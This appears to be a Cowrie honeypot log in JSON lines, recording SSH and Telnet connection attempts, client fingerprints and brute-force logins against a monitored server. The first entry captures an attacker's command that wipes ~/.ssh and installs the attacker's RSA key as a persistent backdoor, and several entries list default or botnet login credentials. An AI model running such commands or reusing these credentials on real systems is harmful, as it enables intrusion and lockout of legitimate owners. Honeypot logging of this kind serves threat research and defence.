{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T02:14:43.826629Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T02:14:44.060220Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:44.061228Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40342,"dst_ip":"1.2.3.4","dst_port":22,"session":"f87844a7771c","protocol":"ssh","message":"New connection: 212.227.235.229:40342 (1.2.3.4:22) [session: f87844a7771c]","sensor":"my-vps","timestamp":"2025-08-31T02:14:44.277486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:14:44.288200Z","src_ip":"212.227.235.229","session":"f87844a7771c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:14:44.523853Z","src_ip":"212.227.235.229","session":"f87844a7771c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:45.478517Z","src_ip":"212.227.235.229","session":"f87844a7771c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:46.713328Z","src_ip":"212.227.235.229","session":"f87844a7771c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31724,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12f6319cd84","protocol":"ssh","message":"New connection: 212.227.235.229:31724 (1.2.3.4:22) [session: d12f6319cd84]","sensor":"my-vps","timestamp":"2025-08-31T02:14:46.948186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:14:46.948912Z","src_ip":"212.227.235.229","session":"d12f6319cd84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:14:47.184204Z","src_ip":"212.227.235.229","session":"d12f6319cd84"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:14:48.165196Z","src_ip":"212.227.235.229","session":"d12f6319cd84"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:48.398338Z","src_ip":"212.227.235.229","session":"6909e115c644"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:48.400077Z","src_ip":"212.227.235.229","session":"d12f6319cd84"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37420,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a9f342063b1","protocol":"ssh","message":"New connection: 41.226.27.251:37420 (1.2.3.4:22) [session: 5a9f342063b1]","sensor":"my-vps","timestamp":"2025-08-31T02:14:49.876949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:49.877778Z","src_ip":"41.226.27.251","session":"5a9f342063b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:14:49.921504Z","src_ip":"41.226.27.251","session":"5a9f342063b1"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T02:14:50.053186Z","src_ip":"41.226.27.251","session":"5a9f342063b1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:51.379336Z","src_ip":"41.226.27.251","session":"5a9f342063b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58026,"dst_ip":"1.2.3.4","dst_port":23,"session":"38b4cf67ee48","protocol":"telnet","message":"New connection: 212.227.125.160:58026 (1.2.3.4:23) [session: 38b4cf67ee48]","sensor":"my-vps","timestamp":"2025-08-31T02:14:52.121929Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48362,"dst_ip":"1.2.3.4","dst_port":22,"session":"35d6c9928548","protocol":"ssh","message":"New connection: 212.227.125.160:48362 (1.2.3.4:22) [session: 35d6c9928548]","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.607900Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.608650Z","src_ip":"212.227.125.160","session":"35d6c9928548"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.610879Z","src_ip":"212.227.125.160","session":"35d6c9928548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48376,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3f9242b5c3","protocol":"ssh","message":"New connection: 212.227.125.160:48376 (1.2.3.4:22) [session: 8e3f9242b5c3]","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.811051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_for_Windows_8.1","message":"Remote SSH version: SSH-2.0-OpenSSH_for_Windows_8.1","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.814296Z","src_ip":"212.227.125.160","session":"8e3f9242b5c3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:14:53.913605Z","src_ip":"212.227.125.160","session":"8e3f9242b5c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38458,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c6d286cb950","protocol":"ssh","message":"New connection: 212.227.235.229:38458 (1.2.3.4:22) [session: 5c6d286cb950]","sensor":"my-vps","timestamp":"2025-08-31T02:14:57.780190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:14:58.662462Z","src_ip":"212.227.235.229","session":"5c6d286cb950"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:14:58.663239Z","src_ip":"212.227.235.229","session":"5c6d286cb950"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:14:58.813566Z","src_ip":"212.227.125.160","session":"8e3f9242b5c3"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"welcome","message":"login attempt [elastic/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:15:04.868107Z","src_ip":"212.227.235.229","session":"5c6d286cb950"}
{"eventid":"cowrie.session.closed","duration":13.068711042404175,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:05.190576Z","src_ip":"212.227.125.160","session":"38b4cf67ee48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58257,"dst_ip":"1.2.3.4","dst_port":23,"session":"150fe7c20dd6","protocol":"telnet","message":"New connection: 212.227.125.160:58257 (1.2.3.4:23) [session: 150fe7c20dd6]","sensor":"my-vps","timestamp":"2025-08-31T02:15:05.293414Z"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:06.772509Z","src_ip":"212.227.235.229","session":"5c6d286cb950"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54870,"dst_ip":"1.2.3.4","dst_port":22,"session":"f278c56b6345","protocol":"ssh","message":"New connection: 41.226.27.251:54870 (1.2.3.4:22) [session: f278c56b6345]","sensor":"my-vps","timestamp":"2025-08-31T02:15:10.006949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:15:10.022541Z","src_ip":"41.226.27.251","session":"f278c56b6345"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:15:10.051550Z","src_ip":"41.226.27.251","session":"f278c56b6345"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T02:15:10.221537Z","src_ip":"41.226.27.251","session":"f278c56b6345"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:11.543344Z","src_ip":"41.226.27.251","session":"f278c56b6345"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54112,"dst_ip":"1.2.3.4","dst_port":22,"session":"92e5c901fc00","protocol":"ssh","message":"New connection: 217.72.205.35:54112 (1.2.3.4:22) [session: 92e5c901fc00]","sensor":"my-vps","timestamp":"2025-08-31T02:15:13.254161Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:13.255408Z","src_ip":"217.72.205.35","session":"92e5c901fc00"}
{"eventid":"cowrie.session.closed","duration":12.858145236968994,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:18.151486Z","src_ip":"212.227.125.160","session":"150fe7c20dd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58475,"dst_ip":"1.2.3.4","dst_port":23,"session":"c795551f840a","protocol":"telnet","message":"New connection: 212.227.125.160:58475 (1.2.3.4:23) [session: c795551f840a]","sensor":"my-vps","timestamp":"2025-08-31T02:15:18.259234Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57848,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8a31bc5fe7","protocol":"ssh","message":"New connection: 212.227.125.160:57848 (1.2.3.4:22) [session: de8a31bc5fe7]","sensor":"my-vps","timestamp":"2025-08-31T02:15:20.221957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:15:20.845479Z","src_ip":"212.227.125.160","session":"de8a31bc5fe7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:15:20.846180Z","src_ip":"212.227.125.160","session":"de8a31bc5fe7"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"welcome","message":"login attempt [elastic/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:15:22.905143Z","src_ip":"212.227.125.160","session":"de8a31bc5fe7"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:24.711526Z","src_ip":"212.227.125.160","session":"de8a31bc5fe7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":45310,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce412174816e","protocol":"ssh","message":"New connection: 41.226.27.251:45310 (1.2.3.4:22) [session: ce412174816e]","sensor":"my-vps","timestamp":"2025-08-31T02:15:30.627550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:15:30.628558Z","src_ip":"41.226.27.251","session":"ce412174816e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:15:30.672042Z","src_ip":"41.226.27.251","session":"ce412174816e"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:15:30.803889Z","src_ip":"41.226.27.251","session":"ce412174816e"}
